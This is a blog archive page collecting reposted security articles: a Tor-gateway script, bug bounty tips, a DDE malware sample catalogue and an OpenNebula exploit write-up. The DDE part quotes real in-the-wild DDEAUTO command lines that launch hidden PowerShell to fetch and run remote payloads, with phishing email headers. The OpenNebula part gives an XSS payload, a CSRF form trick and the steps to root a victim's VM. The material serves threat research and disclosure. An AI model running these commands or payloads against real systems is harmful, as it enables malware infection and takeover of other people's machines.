Velhos metaleiros: abril 2020

domingo, 26 de abril de 2020

Workshop And Presentation Slides And Materials

All of our previous workshop and presentation slides and materials are available in one location, from Google Drive.

From now on, we are only going to keep the latest-greatest version of each talk/workshop and announce changes on Twitter.

Nipe - A Script To Make TOR Network Your Default Gateway

Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both Licit and Illicit purposes. Tor has, for example, been used by criminals enterprises, Hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously.

Nipe is a Script to make Tor Network your Default Gateway.

This Perl Script enables you to directly route all your traffic from your computer to the Tor Network through which you can surf the Internet Anonymously without having to worry about being tracked or traced back.

Download and install:

    git clone https://github.com/GouveaHeitor/nipe
    cd nipe
    cpan install Switch JSON LWP::UserAgent

Commands:

    COMMAND          FUNCTION
    install          Install dependencies
    start            Start routing
    stop             Stop routing
    restart          Restart the Nipe process
    status           See status

    Examples:

    perl nipe.pl install
    perl nipe.pl start
    perl nipe.pl stop
    perl nipe.pl restart
    perl nipe.pl status

Bugs

Report bugs in my email: [hi@heitorgouvea.me]

Download Nipe

Related posts

sábado, 25 de abril de 2020

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?

These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.

Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Related articles

DDE Command Execution Malware Samples

Here are a few samples related to the recent DDE Command execution

Reading:
10/18/2017 InQuest/yara-rules
10/18/2017 https://twitter.com/i/moments/918126999738175489

10/18/2017 Inquest: Microsoft Office DDE Macro-less Command Execution Vulnerability

10/18/2017 Inquest: Microsoft Office DDE Vortex Ransomware Targeting Poland

10/16/2017 https://twitter.com/noottrak/status/919975081828261888

10/14/2017 Inquest: Microsoft Office DDE Freddie Mac Targeted Lure

10/14/2017 Inquest: Microsoft Office DDE SEC OMB Approval Lure

10/12/2017 NViso labs: YARA DDE rules: DDE Command Execution observed in-the-wild

10/11/2017 Talos:Spoofed SEC Emails Distribute Evolved DNSMessenger

10/10/2017 NViso labs: MS Office DDE YARA rules

10/09/2017 Sensepost: Macro-less Code Exec in MSWord

Download

Download. Email me if you need the password (updated sample pack)

File information

List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669

File details with MD5 hashes:

Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e.

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e "

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")

7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a

9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460

10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450

Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe Poland payload
09d71f068d2bbca9fac090bde74e762b

Message information

For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])

by m0049925.ppops.net with ESMTP id 2dhb488ej6-1

(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)

for <snip>; Wed, 11 Oct 2017 00:09:20 -0400

Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)

(envelope-from <EDGAR@sec.gov>)

id 1e28HE-0001S5-Ew

for <snip>; Wed, 11 Oct 2017 00:05:48 -0400

To: <snip>

Subject: EDGAR Filings

X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75

X-PHP-Originating-Script: 658:class.phpmailer.php

Date: Wed, 11 Oct 2017 04:05:48 +0000

From: EDGAR <EDGAR@sec.gov>

Reply-To: EDGAR <EDGAR@sec.gov>

Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>

X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)

MIME-Version: 1.0

Content-Type: multipart/mixed;

boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"

Content-Transfer-Encoding: 8bit

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com

X-AntiAbuse: Original Domain - nu.com

X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]

X-AntiAbuse: Sender Address Domain - sec.gov

X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed

X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo

X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp

X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php

X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples

X-CLX-Shades: Junk

X-CLX-Response: <snip>

X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,

signatures=0

X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0

suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262

lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk

adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000

definitions=main-1710110060

This is a multi-part message in MIME format.

--b1_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: multipart/alternative;

boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

--b2_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings

--b2_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>

--b2_7608a3de5fe6c9bf7df6782a8aa9790f--

--b1_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

<snip>

--b1_7608a3de5fe6c9bf7df6782a8aa9790f--

for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by

AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP

Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id

15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000

Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by

VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP

Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id

15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000

Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com

(2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com

(2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,

cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct

2017 10:45:14 +0000

Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by

VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft

SMTP Server (version=TLS1_2,

cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend

Transport; Thu, 12 Oct 2017 10:45:14 +0000

Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by

DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP

Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id

15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000

Received: from <snip> (10.234.178.186) by

<snip>(10.144.20.58) with Microsoft SMTP

Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200

Received: from <snip> (10.234.174.102) by

<snip> with Microsoft SMTP Server

id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100

Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by

Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017

11:43:38 +0100 (CET)

Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by

rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,

12 Oct 2017 11:43:36 +0100

Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by

rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017

11:43:36 +0100

Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com

[188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender

<Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id

v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100

(BST)

Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])

(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client

certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id

571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)

From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>

To: <snip>

Subject: Document

Thread-Topic: Document

Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==

Date: Thu, 12 Oct 2017 10:43:35 +0000

Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>

Content-Language: en-US

X-MS-Exchange-Organization-AuthSource: <snip>

X-MS-Has-Attach: yes

X-MS-TNEF-Correlator:

received-spf: Fail (protection.outlook.com: domain of <snip> does

not designate 147.152.120.47 as permitted sender)

receiver=protection.outlook.com; client-ip=147.152.120.47;

helo=<snip>;

x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124

x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx

x-ms-publictraffictype: Email

X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c

Content-Type: multipart/mixed;

boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"

MIME-Version: 1.0

Related posts

Save Your Cloud: Gain Root Access To VMs In OpenNebula 4.6.1

In this post, we show a proof-of-concept attack that gives us root access to a victim's VM in the Cloud Management Platform OpenNebula, which means that we can read and write all its data, install software, etc. The interesting thing about the attack is, that it allows an attacker to bridge the gap between the cloud's high-level web interface and the low-level shell-access to a virtual machine.

Like the latest blogpost of this series, this is a post about an old CSRF- and XSS-vulnerability that dates back to 2014. However, the interesting part is not the vulnerability itself but rather the exploit that we were able to develop for it.

An attacker needs the following information for a successful attack.

ID of the VM to attack
OpenNebula's VM ID is a simple global integer that is increased whenever a VM is instantiated. The attacker may simply guess the ID. Once the attacker can execute JavaScript code in the scope of Sunstone, it is possible to use OpenNebula's API and data structures to retrieve this ID based on the name of the desired VM or its IP address.
Operating system & bootloader
There are various ways to get to know a VMs OS, apart from simply guessing. For example, if the VM runs a publicly accessible web server, the OS of the VM could be leaked in the HTTP-Header Server (see RFC 2616). Another option would be to check the images or the template the VM was created from. Usually, the name and description of an image contains information about the installed OS, especially if the image was imported from a marketplace.
Since most operating systems are shipped with a default bootloader, making a correct guess about a VMs bootloader is feasible. Even if this is not possible, other approaches can be used (see below).
Keyboard layout of the VM's operating system
As with the VMs bootloader, making an educated guess about a VM's keyboard layout is not difficult. For example, it is highly likely that VMs in a company's cloud will use the keyboard layout of the country the company is located in.

Overview of the Attack

The key idea of this attack is that neither Sunstone nor noVNC check whether keyboard related events were caused by human input or if they were generated by a script. This can be exploited so that gaining root access to a VM in OpenNebula requires five steps:

Using CSRF, a persistent XSS payload is deployed.
The XSS payload controls Sunstone's API.
The noVNC window of the VM to attack is loaded into an iFrame.
The VM is restarted using Sunstone's API.
Keystroke-events are simulated in the iFrame to let the bootloader open a root shell.

Figure 1: OpenNebula's Sunstone Interface displaying the terminal of a VM in a noVNC window.

The following sections give detailed information about each step.

Executing Remote Code in Sunstone

In Sunstone, every account can choose a display language. This choice is stored as an account parameter (e.g. for English LANG=en_US). In Sunstone, the value of the LANG parameter is used to construct a <script> tag that loads the corresponding localization script. For English, this creates the following tag:

<script src="locale/en_US/en_US.js?v=4.6.1" type="text/javascript"></script>

Setting the LANG parameter to a different string directly manipulates the path in the script tag. This poses an XSS vulnerability. By setting the LANG parameter to LANG="onerror=alert(1)//, the resulting script tag looks as follows:

<script src="locale/"onerror=alert(1)///"onerror=alert(1)//.js?v=4.6.1" type="text/javascript"></script>

For the web browser, this is a command to fetch the script locale/ from the server. However, this URL points to a folder, not a script. Therefore, what the server returns is no JavaScript. For the browser, this is an error, so the browser executes the JavaScript in the onerror statement: alert(1). The rest of the line (including the second alert(1)) is treated as comment due to the forward slashes.

When a user updates the language setting, the browser sends an XMLHttpRequest of the form

{ "action" : { "perform" : "update", "params" : { "template_raw" : "LANG=\"en_US\"" } }}

to the server (The original request contains more parameters. Since these parameters are irrelevant for the technique, we omitted them for readability.). Forging a request to Sunstone from some other web page via the victim's browser requires a trick since one cannot use an XMLHttpRequest due to restrictions enforced by the browser's Same-Origin-Policy. Nevertheless, using a self-submitting HTML form, the attacker can let the victim's browser issue a POST request that is similar enough to an XMLHttpRequest so that the server accepts it.

An HTML form field like

<input name='deliver' value='attacker' />

is translated to a request in the form of deliver=attacker. To create a request changing the user's language setting to en_US, the HTML form has to look like

<input name='{"action":{"perform":"update","params":{"template_raw":"LANG' value='\"en_US\""}}}' />

Notice that the equals sign in LANG=\"en_US\" is inserted by the browser because of the name=value format.

Figure 2: OpenNebula's Sunstone Interface displaying a user's attributes with the malicious payload in the LANG attribute.

Using this trick, the attacker sets the LANG parameter for the victim's account to "onerror=[remote code]//, where [remote code] is the attacker's exploit code. The attacker can either insert the complete exploit code into this parameter (there is no length limitation) or include code from a server under the attacker's control. Once the user reloads Sunstone, the server delivers HTML code to the client that executes the attacker's exploit.

Prepare Attack on VM

Due to the overwritten language parameter, the victim's browser does not load the localization script that is required for Sunstone to work. Therefore, the attacker achieved code execution, but Sunstone breaks and does not work anymore. For this reason, the attacker needs to set the language back to a working value (e.g. en_US) and reload the page in an iFrame. This way Sunstone is working again in the iFrame, but the attacker can control the iFrame from the outside. In addition, the attack code needs to disable a watchdog timer outside the iFrame that checks whether Sunstone is correctly initialized.

From this point on, the attacker can use the Sunstone API with the privileges of the victim. This way, the attacker can gather all required information like OpenNebula's internal VM ID and the keyboard layout of the VM's operating system from Sunstone's data-structures based on the name or the IP address of the desired VM.

Compromising a VM

Using the Sunstone API the attacker can issue a command to open a VNC connection. However, this command calls window.open, which opens a new browser window that the attacker cannot control. To circumvent this restriction, the attacker can overwrite window.open with a function that creates an iFrame under the attacker's control.

Once the noVNC-iFrame has loaded, the attacker can send keystrokes to the VM using the dispatchEvent function. Keystrokes on character keys can be simulated using keypress events. Keystrokes on special keys (Enter, Tab, etc.) have to be simulated using pairs of keydown and keyup events since noVNC filters keypress events on special keys.

Getting Root Access to VM

To get root access to a VM the attacker can reboot a victim's VM using the Sunstone API and then control the VM's bootloader by interrupting it with keystrokes. Once the attacker can inject commands into the bootloader, it is possible to use recovery options or the single user mode of Linux based operating systems to get a shell with root privileges. The hardest part with this attack is to get the timing right. Usually, one only has a few seconds to interrupt a bootloader. However, if the attacker uses the hard reboot feature, which instantly resets the VM without shutting it down gracefully, the time between the reboot command and the interrupting keystroke can be roughly estimated.

Even if the bootloader is unknown, it is possible to use a try-and-error approach. Since the variety of bootloaders is small, one can try for one particular bootloader and reset the machine if the attack was unsuccessful. Alternatively, one can capture a screenshot of the noVNC canvas of the VM a few seconds after resetting the VM and determine the bootloader.

A video of the attack can be seen here. The browser on the right hand side shows the victim's actions. A second browser on the left hand side shows what is happening in OpenNebula. The console window on the bottom right shows that there is no user-made keyboard input while the attack is happening.